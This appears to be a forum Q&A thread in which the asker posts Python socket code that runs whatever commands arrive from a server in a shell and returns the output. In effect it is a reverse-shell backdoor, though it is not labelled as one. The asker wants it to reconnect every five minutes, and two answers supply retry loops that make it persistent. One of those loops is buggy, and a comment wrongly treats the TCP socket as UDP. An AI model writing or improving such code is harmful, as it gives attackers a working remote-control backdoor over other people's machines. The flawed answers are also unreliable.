# how can try to connecting when my server is diconnect in python

Tags: python, sockets

i want to connect to server but if server be disconnect my code has error and exit , i want my code try to connect when server is disconnect every 5 min
my code :

```
import socket
import subprocess

HOST = '127.0.0.1' 
PORT = 534

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
while 1:
    data = s.recv(1024)
    proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    stdout_value = proc.stdout.read() + proc.stderr.read()
    s.send(stdout_value)

s.close()
```

Answer (score 1):

Why can't you do some thing like try/except. Keep this logic where ever required. Whether it is just during connection or during data transfer/receive.

```
while True:
   try:
       s.connect((HOST, PORT))
       break
   except:
       time.sleep(5 * 60)
```

Answer (score 0):

Do a try statement:

```
import time
def connectTry():
    global host
    global port
    global s
    try:
        s.connect((HOST, PORT))
    except:
        time.sleep(300)
        connectTry()
```

Comment: File "c:\a.py", line 30, in <module>
    data = s.recv(1024)
socket.error: [Errno 10057] A request to send or receive data was disallowed bec
ause the socket is not connected and (when sending on a datagram socket using a
sendto call) no address was supplied

Comment: I don't know much about UDP, sorry. If it was TCP I would be able to help.